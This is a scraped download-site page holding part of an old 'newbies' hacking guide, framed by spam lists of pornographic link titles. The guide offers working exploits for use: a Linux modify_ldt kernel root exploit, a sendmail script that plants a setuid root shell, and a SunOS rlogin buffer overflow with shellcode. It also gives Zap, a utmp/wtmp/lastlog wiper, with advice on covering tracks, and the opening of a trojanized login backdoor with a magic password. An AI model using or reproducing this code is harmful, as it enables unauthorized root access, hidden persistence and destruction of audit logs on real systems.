亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? the newbies-user's guide to hacking.txt

?? a collection of mega hacking tools
?? TXT
?? 第 1 頁 / 共 4 頁
字號(hào):
!!!)/* this is a hack of a hack.  a valid System.map was needed to get this    sploit to werk.. but not any longer.. This sploit will give you root   if the modify_ldt bug werks.. which I beleive it does in any kernel    before 1.3.20 ..      QuantumG*//* original code written by Morten Welinder. * * this required 2 hacks to work on the 1.2.13 kernel that I've tested on: * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed. * 2. the _task in the System.map file has no leading underscore. * I am not sure at what point these were changed, if you are * using this on a newer kernel compile with NEWERKERNEL defined. *                                          -ReD */#include <linux/ldt.h>#include <stdio.h>#include <linux/unistd.h>#include <signal.h>#ifdef NEWERKERNEL#include <asm/sigcontext.h>#endif#define __KERNEL__#include <linux/sched.h>#include <linux/module.h>static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)#define KERNEL_BASE 0xc0000000/* ------------------------------------------------------------------------ */static __inline__ unsigned char__farpeek (int seg, unsigned ofs){  unsigned char res;  asm ("mov %w1,%%gs ; gs; movb (%2),%%al"       : "=a" (res)       : "r" (seg), "r" (ofs));  return res;}/* ------------------------------------------------------------------------ */static __inline__ void__farpoke (int seg, unsigned ofs, unsigned char b){  asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"       : /* No results.  */       : "r" (seg), "r" (ofs), "r" (b));}/* ------------------------------------------------------------------------ */voidmemgetseg (void *dst, int seg, const void *src, int size){  while (size-- > 0)    *(char *)dst++ = __farpeek (seg, (unsigned)(src++));}/* ------------------------------------------------------------------------ */voidmemputseg (int seg, void *dst, const void *src, int size){  while (size-- > 0)    __farpoke (seg, (unsigned)(dst++), *(char *)src++);}/* ------------------------------------------------------------------------ */intmain (){  int stat, i,j,k;  struct modify_ldt_ldt_s ldt_entry;  FILE *syms;  char line[100];  struct task_struct **task, *taskptr, thistask;  struct kernel_sym blah[4096];  printf ("Bogusity checker for modify_ldt system call.\n");  printf ("Testing for page-size limit bug...\n");  ldt_entry.entry_number = 0;  ldt_entry.base_addr = 0xbfffffff;  ldt_entry.limit = 0;  ldt_entry.seg_32bit = 1;  ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;  ldt_entry.read_exec_only = 0;  ldt_entry.limit_in_pages = 1;  ldt_entry.seg_not_present = 0;  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));  if (stat)    /* Continue after reporting error.  */    printf ("This bug has been fixed in your kernel.\n");  else    {      printf ("Shit happens: ");      printf ("0xc0000000 - 0xc0000ffe is accessible.\n");    }  printf ("Testing for expand-down limit bug...\n");  ldt_entry.base_addr = 0x00000000;  ldt_entry.limit = 1;  ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;  ldt_entry.limit_in_pages = 0;  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));  if (stat)    {      printf ("This bug has been fixed in your kernel.\n");      return 1;    }  else    {      printf ("Shit happens: ");      printf ("0x00000000 - 0xfffffffd is accessible.\n");    }  i = get_kernel_syms(blah);  k = i+10;  for (j=0; j<i; j++)    if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j;  if (k==i+10) { printf("current not found!!!\n"); return(1); }  j=k;  taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);  memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));    taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);  memgetseg (&thistask, 7, taskptr, sizeof (thistask));    if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }  printf("Current process is %i\n",thistask.pid);  taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);  memgetseg (&thistask, 7, taskptr, sizeof (thistask));    if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }  printf("Parent process is %i\n",thistask.pid);  thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;  thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;  memputseg (7, taskptr, &thistask, sizeof (thistask));  printf ("Shit happens: parent process is now root process.\n");  return 0;};c.) Other linux versions:Sendmail exploit:#/bin/sh###                                   Hi !#                This is exploit for sendmail smtpd bug#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).#         This shell script does a root shell in /tmp directory.#          If you have any problems with it, drop me a letter.#                                Have fun !###                           ----------------------#               ---------------------------------------------#    -----------------   Dedicated to my beautiful lady   ------------------#               ---------------------------------------------#                           ----------------------##          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su###echo   'main()                                                '>>leshka.cecho   '{                                                     '>>leshka.cecho   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.cecho   '}                                                     '>>leshka.c##echo   'main()                                                '>>smtpd.cecho   '{                                                     '>>smtpd.cecho   '  setuid(0); setgid(0);                               '>>smtpd.cecho   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.cecho   '}                                                     '>>smtpd.c##cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c./leshkakill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`rm leshka.c leshka smtpd.c /tmp/smtpdecho "Now type:   /tmp/sh"SUNOS:Rlogin exploit:(arghh!)#include <stdio.h>#include <stdlib.h>#include <sys/types.h>#include <unistd.h>#define BUF_LENGTH      8200#define EXTRA           100#define STACK_OFFSET    4000#define SPARC_NOP       0xa61cc013u_char sparc_shellcode[] ="\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13""\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e""\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a""\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc""\x82\x10\x20\x3b\x91\xd4\xff\xff";u_long get_sp(void){  __asm__("mov %sp,%i0 \n");}void main(int argc, char *argv[]){  char buf[BUF_LENGTH + EXTRA];  long targ_addr;  u_long *long_p;  u_char *char_p;  int i, code_length = strlen(sparc_shellcode);  long_p = (u_long *) buf;  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)    *long_p++ = SPARC_NOP;  char_p = (u_char *) long_p;  for (i = 0; i < code_length; i++)    *char_p++ = sparc_shellcode[i];  long_p = (u_long *) char_p;  targ_addr = get_sp() - STACK_OFFSET;  for (i = 0; i < EXTRA / sizeof(u_long); i++)    *long_p++ = targ_addr;  printf("Jumping to address 0x%lx\n", targ_addr);  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);  perror("execl failed");}Want more exploits? Get 'em from other sites (like rootshell,dhp.com/~fyodor, etc...).Step 3: Covering your tracks:______For this you could use lots of programs like zap, utclean, and lots ofothers...Watch out, ALWAYS after you cloaked yourself to see if it worked do a:victim1:~$ who...(crap)...victim1:~$ finger...;as;;sda...victim1:~$w...If you are still not cloaked, look for wtmpx, utmpx and other stuff likethat. The only cloaker (that I know) that erased me even from wtmpx/utmpxwas utclean. But I don't have it right now, so ZAP'll have to do the job./*      Title:  Zap.c (c) rokK Industries   Sequence:  911204.B     Syztems:  Kompiles on SunOS 4.+       Note:  To mask yourself from lastlog and wtmp you need to be root,              utmp is go+w on default SunOS, but is sometimes removed.    Kompile:  cc -O Zap.c -o Zap        Run:  Zap <Username>        Desc:  Will Fill the Wtmp and Utmp Entries corresponding to the              entered Username. It also Zeros out the last login data for              the specific user, fingering that user will show 'Never Logged              In'       Usage:  If you cant find a usage for this, get a brain.*/ #include <sys/types.h>#include <stdio.h>#include <unistd.h>#include <fcntl.h>#include <utmp.h>#include <lastlog.h>#include <pwd.h> int f; void kill_tmp(name,who)char *name,     *who;{    struct utmp utmp_ent;   if ((f=open(name,O_RDWR))>=0) {     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);                 write (f, &utmp_ent, sizeof (utmp_ent));            }     close(f);  }} void kill_lastlog(who)char *who;{    struct passwd *pwd;    struct lastlog newll;      if ((pwd=getpwnam(who))!=NULL) {         if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);            bzero((char *)&newll,sizeof( newll ));            write(f, (char *)&newll, sizeof( newll ));            close(f);        }     } else printf("%s: ?\n",who);} main(argc,argv)int  argc;char *argv[];{    if (argc==2) {        kill_tmp("/etc/utmp",argv[1]);        kill_tmp("/usr/adm/wtmp",argv[1]);        kill_lastlog(argv[1]);        printf("Zap!\n");    } else    printf("Error.\n");}Step 4: Keeping that account._______This usually means that you'll have to install some programs to give youaccess even if the root has killed your account...(DAEMONS!!!) =>|-@ Here is an example of a login daemon from the DemonKit (good job,fellows...)LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's dateof creation. (use touch --help to see how!)/*This is a simple trojanized login program, this was designed for Linuxand will not work without modification on linux. It lets you login aseither a root user, or any ordinary user by use of a 'magic password'.It will also prevent the login from being logged into utmp, wtmp, etc.You will effectively be invisible, and not be detected except via 'ps'.*/#define BACKDOOR                    "password"int     krad=0;/* This program is derived from 4.3 BSD software and is   subject to the copyright notice below.   The port to HP-UX has been motivated by the incapability   of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.   Changes:   - General HP-UX portation. Use of facilities not available     in HP-UX (e.g. setpriority) has been eliminated.     Utmp/wtmp handling has been ported.   - The program uses BSD command line options to be used     in connection with e.g. 'rlogind' i.e. 'new login'.   - HP features left out:          logging of bad login attempts in /etc/btmp,				    they are sent to syslog				    password expiry				    '*' as login shell, add it if you need it   - BSD features left out:         quota checks				    password expiry				    analysis of terminal type (tset feature)   - BSD features thrown in:        Security logging to syslogd.                                    This requires you to have a (ported) syslog				    system -- 7.0 comes with syslog				    				    'Lastlog' feature.   - A lot of nitty gritty details has been adjusted in favour of     HP-UX, e.g. /etc/securetty, default paths and the environment     variables assigned by 'login'.   - We do *nothing* to setup/alter tty state, under HP-UX this is     to be done by getty/rlogind/telnetd/some one else.   Michael Glad (glad@daimi.dk)   Computer Science Department   Aarhus University   Denmark   1990-07-04   1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port:              - now explictly sets non-blocking mode on descriptors	      - strcasecmp is now part of HP-UX   1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12   From 1992 till now (1995) this code for Linux has been maintained at   ftp.daimi.aau.dk:/pub/linux/poe/*/   /* * Copyright (c) 1980, 1987, 1988 The Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Berkeley.  The name of the * University may not be used to endorse or promote products derived * from this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. */#ifndef lintchar copyright[] ="@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\ All rights reserved.\n";#endif /* not lint */#ifndef lintstatic char sccsid[] = "@(#)login.c	5.40 (Berkeley) 5/9/89";#endif /* not lint *//* * login [ name ] * login -h hostname	(for telnetd, etc.) * login -f name	(for pre-authenticated login: datakit, xterm, etc.) *//* #define TESTING */#ifdef TESTING#include "param.h"#else#include <sys/param.h>#endif#include <ctype.h>#include <unistd.h>#include <getopt.h>#include <memory.h>#include <sys/stat.h>#include <sys/time.h>#include <sys/resource.h>#include <sys/file.h>#include <termios.h>#include <string.h>#define index strchr#define rindex strrchr#include <sys/ioctl.h>#include <signal.h>#include <errno.h>#include <grp.h>#include <pwd.h>

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號(hào) Ctrl + =
減小字號(hào) Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美极品aⅴ影院| 欧美日本免费一区二区三区| 韩国三级电影一区二区| 亚洲国产精品久久久久秋霞影院| 国产精品美日韩| 中国色在线观看另类| 亚洲欧美中日韩| 亚洲乱码国产乱码精品精可以看| 亚洲精品免费一二三区| 亚洲精品成人悠悠色影视| 亚洲色图20p| 午夜久久电影网| 精品一区二区三区香蕉蜜桃| 国产成人av影院| 99国产精品久久| 在线观看日韩高清av| 日韩欧美国产午夜精品| 久久蜜桃一区二区| 亚洲男人的天堂av| 青青草国产成人99久久| 国产成人午夜视频| 91福利国产精品| 日韩一区二区三区在线观看 | 欧美日韩一级片网站| 欧美一区二区三区在线视频| 久久久亚洲高清| 亚洲品质自拍视频| 日本女优在线视频一区二区| 成人永久aaa| 欧美午夜影院一区| 久久久久国产一区二区三区四区| 亚洲精品视频在线| 久久精品国产免费看久久精品| 波多野结衣视频一区| 宅男噜噜噜66一区二区66| 国产精品免费视频观看| 秋霞影院一区二区| 成人午夜在线播放| 欧美一级二级三级蜜桃| 亚洲精品videosex极品| 国产一区二区三区在线看麻豆| 色综合久久久久综合体桃花网| 日韩亚洲欧美在线| 亚洲一二三区不卡| 成人午夜碰碰视频| 精品国产一区二区精华| 亚洲成在线观看| av亚洲精华国产精华精| 欧美精品一区二区三区在线| 亚洲五码中文字幕| 99精品视频一区| 久久久久久黄色| 久久99在线观看| 欧美久久久久免费| 一个色妞综合视频在线观看| 福利一区二区在线观看| 欧美电影免费观看高清完整版| 一片黄亚洲嫩模| 成人精品免费网站| 国产亚洲欧美日韩在线一区| 免费观看一级欧美片| 欧美精品日日鲁夜夜添| 亚洲午夜激情网站| 欧美自拍偷拍一区| 亚洲一区二区免费视频| 欧美私模裸体表演在线观看| 亚洲男人的天堂在线观看| 91麻豆精东视频| 亚洲乱码中文字幕| 色综合婷婷久久| 国产精品国产三级国产aⅴ原创| 国产一区二区三区不卡在线观看| 日韩欧美亚洲一区二区| 免费欧美高清视频| 日韩欧美国产一区二区三区| 久久国产麻豆精品| 久久精品在这里| 国产成人久久精品77777最新版本| 久久综合九色综合97婷婷女人| 久久精品噜噜噜成人av农村| 欧美成人精品1314www| 精品一区二区在线视频| 久久精品一级爱片| 成人av在线播放网址| 亚洲乱码国产乱码精品精的特点| 色狠狠色噜噜噜综合网| 亚洲成人一区二区在线观看| 欧美精品在线视频| 国产九色sp调教91| 中文字幕日韩一区| 欧亚一区二区三区| 麻豆国产欧美日韩综合精品二区 | 亚洲欧洲日韩综合一区二区| 在线观看日韩一区| 麻豆91在线观看| 国产精品人妖ts系列视频| 欧美影院精品一区| 精东粉嫩av免费一区二区三区| 亚洲国产精品av| 欧美日韩国产另类一区| 国产精品一区二区在线观看网站 | 久久婷婷国产综合国色天香| 成人精品在线视频观看| 亚洲动漫第一页| 日韩精品一区二区三区在线| 不卡在线观看av| 日韩av午夜在线观看| 国产精品视频麻豆| 在线不卡一区二区| 成人精品鲁一区一区二区| 亚洲高清在线视频| 国产女同互慰高潮91漫画| 欧美日韩一卡二卡三卡 | 亚洲视频在线观看一区| 日韩一区二区三| 一本久久a久久精品亚洲| 久久精品国产亚洲一区二区三区| 日韩一区欧美一区| 精品国产乱码久久久久久免费| 色欧美日韩亚洲| 国产福利一区二区三区视频在线| 亚洲18影院在线观看| 欧美国产综合一区二区| 日韩欧美在线网站| 欧美综合天天夜夜久久| 成人激情图片网| 极品尤物av久久免费看| 亚洲成年人网站在线观看| 国产精品麻豆一区二区 | 国产高清视频一区| 亚洲va天堂va国产va久| 亚洲精品欧美在线| 中文字幕在线一区| 国产日产欧美一区| 26uuu精品一区二区三区四区在线| 欧美日韩国产综合一区二区三区 | 精品美女一区二区| 欧美老人xxxx18| 欧美性大战久久久| 欧美一a一片一级一片| 不卡的av电影| 国产成人午夜高潮毛片| 国产成人亚洲综合色影视| 久久国产尿小便嘘嘘| 久久 天天综合| 久久精品国产成人一区二区三区| 亚洲一区二区三区四区五区中文 | 久久久久久久久久美女| 欧美xxxx老人做受| 26uuu国产在线精品一区二区| 日韩欧美一级特黄在线播放| 3d成人h动漫网站入口| 6080亚洲精品一区二区| 在线播放中文字幕一区| 91精品国产一区二区三区| 欧美一区二区三区啪啪| 精品国产乱码久久久久久久| www国产精品av| 国产欧美视频在线观看| 国产精品美女久久久久久久久久久| 欧美国产成人在线| 亚洲精品美腿丝袜| 亚洲18影院在线观看| 麻豆91免费观看| 国产一区欧美二区| www.欧美色图| 欧美系列一区二区| 精品国产成人系列| 国产精品久久久久毛片软件| 一区二区欧美精品| 久久国产夜色精品鲁鲁99| 成人性生交大片免费看视频在线| 97久久精品人人澡人人爽| 欧美三级视频在线| 亚洲精品一区二区三区精华液| 国产欧美日韩不卡免费| 亚洲自拍都市欧美小说| 美腿丝袜亚洲三区| www.欧美精品一二区| 欧美日韩你懂得| 国产欧美一区视频| 亚洲国产欧美日韩另类综合 | av激情综合网| 欧美伦理影视网| 国产日本欧美一区二区| 亚洲6080在线| 懂色av一区二区三区免费观看| 色8久久精品久久久久久蜜| 日韩欧美另类在线| 亚洲欧美成人一区二区三区| 奇米四色…亚洲| 91色视频在线| 欧美精品一区二区久久久| 亚洲精品大片www| 国产精品一区二区在线观看网站| 欧美亚洲国产一区在线观看网站| 精品日韩一区二区三区| 亚洲成a人片综合在线| 盗摄精品av一区二区三区| 日韩欧美电影一二三|